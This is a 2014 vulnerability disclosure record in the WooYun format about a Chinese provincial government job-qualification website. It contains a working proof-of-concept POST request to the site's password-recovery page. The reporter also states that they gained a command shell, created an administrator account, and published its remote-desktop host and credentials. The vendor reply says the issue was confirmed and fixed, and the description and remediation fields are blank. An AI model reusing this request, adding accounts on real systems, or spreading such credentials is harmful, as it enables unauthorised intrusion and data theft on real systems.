Vulnerability Details

Disclosure status:

2014-03-03: Details reported to the vendor; awaiting vendor handling
2014-03-08: Vendor has confirmed; details disclosed to the vendor only
2014-03-18: Details disclosed to core white hats and experts in related fields
2014-03-28: Details disclosed to regular white hats
2014-04-07: Details disclosed to intern white hats
2014-04-17: Details disclosed to the public

Brief description:

...............

Detailed description:

...........

Proof of vulnerability:

URL: http://zyzg.heca.gov.cn/forgot.aspx
data: __VIEWSTATE=%2FwEPDwUJNjQ1OTI2NjE5D2QWAgIDD2QWAgIDDxYCHgtfIUl0ZW1Db3VudAIKFhRmD2QWBAIBDxYCHgRocmVmBRJEZWZhdWx0LmFzcHg%2FSWQ9NzkWAmYPFQEr5YWz5LqOMjAxMuW5tOS4ree6p%2BawtOW5s%2BiAg%2BivleWQiOagvOiAheKApmQCAg8VARIyMDEzLTktMjIgMTE6MDc6MDJkAgEPZBYEAgEPFgIfAQUSRGVmYXVsdC5hc3B4P0lkPTc4FgJmDxUBM%2BWFs%2BS6juihpeWKnueOsOS7u%2BS4k%2BS4muaKgOacr%2BiBjOWKoeS7u%2BiBjOi1hOagvOKApmQCAg8VAREyMDEzLTktMjIgOTo1Njo0MGQCAg9kFgQCAQ8WAh8BBRJEZWZhdWx0LmFzcHg%2FSWQ9NzcWAmYPFQEr5YWz5LqO5YWs5biDMjAxM%2BW5tOW6puiBjOensOiAg%2BivleWQiOagvOKApmQCAg8VARIyMDEzLTktMTEgMTE6MjU6MjJkAgMPZBYEAgEPFgIfAQUSRGVmYXVsdC5hc3B4P0lkPTcwFgJmDxUBK%2BWFs%2BS6jjIwMTPlubTluqbkuJPkuJrmioDmnK%2FogYzliqHku7vogYzigKZkAgIPFQEQMjAxMy01LTcgODozOTo0MWQCBA9kFgQCAQ8WAh8BBRJEZWZhdWx0LmFzcHg%2FSWQ9NjgWAmYPFQEr5YWz5LqOMjAxM%2BW5tOW6pumdnuWFrOacieWItuS8geS4muS4k%2BS4muKApmQCAg8VAREyMDEzLTUtNiAxNjo1MTo0OGQCBQ9kFgQCAQ8WAh8BBRJEZWZhdWx0LmFzcHg%2FSWQ9NjcWAmYPFQES6KGo5qC85aGr5YaZ5qih5p2%2FZAICDxUBETIwMTMtNS02IDE2OjQ3OjM1ZAIGD2QWBAIBDxYCHwEFEkRlZmF1bHQuYXNweD9JZD02NhYCZg8VATHmraPpq5jnuqflt6XnqIvluIjor4TlrqHmnaHku7blhoDogYzmlLnlrZfvvIgy4oCmZAICDxUBETIwMTMtNS02IDE2OjQ2OjQ5ZAIHD2QWBAIBDxYCHwEFEkRlZmF1bHQuYXNweD9JZD02NRYCZg8VATPpq5jnuqflt6XnqIvluIjjgIHlt6XnqIvluIjor4TlrqHmnaHku7blhoDogYzmlLnigKZkAgIPFQERMjAxMy01LTYgMTY6NDU6MjJkAggPZBYEAgEPFgIfAQUSRGVmYXVsdC5hc3B4P0lkPTYyFgJmDxUBMeWKqeeQhuW3peeoi%2BW4iOivhOWuoeadoeS7tuWGgOiBjOaUueWKnuWtl%2B%2B8iDLigKZkAgIPFQESMjAxMi0xMC0xMiA4OjUyOjAxZAIJD2QWBAIBDxYCHwEFEkRlZmF1bHQuYXNweD9JZD02ORYCZg8VARnms6jlhowv55m75b2V5biu5Yqp5paH5Lu2ZAICDxUBETIwMTMtNS02IDE2OjUzOjQ2ZGQ%3D&txtEmail=safe3q%40gmail.com&LoginButton=%E6%89%BE%E5%9B%9E%E5%AF%86%E7%A0%81&txtIDNumber=88952634 (any number works here)

QQ截图20140303135944.png


A port scan showed that port 3389 is open.
With privileges this high, you can get a cmd shell, add users and so on; I added one (how I added it, you know).

Remote desktop: zyzg.heca.gov.cn

Username: 123456, password same as the username

QQ截图20140303140312.png



It is possible to snoop, stop the site from running, delete important files, steal related information, and so on and so forth.

Remediation:

........................

Copyright notice: please credit the source when reposting: 雅柏菲卡@乌云


Vulnerability Response

Vendor response:

Severity: High

Vulnerability Rank: 15

Confirmation time: 2014-03-08 11:29

Vendor reply:

CNVD has confirmed and reproduced the described situation; it has been forwarded by CNCERT to the Hebei branch center for handling as an urgent incident. The Hebei branch center reports that the fix has been completed.

Latest status:

None yet


Vulnerability rating: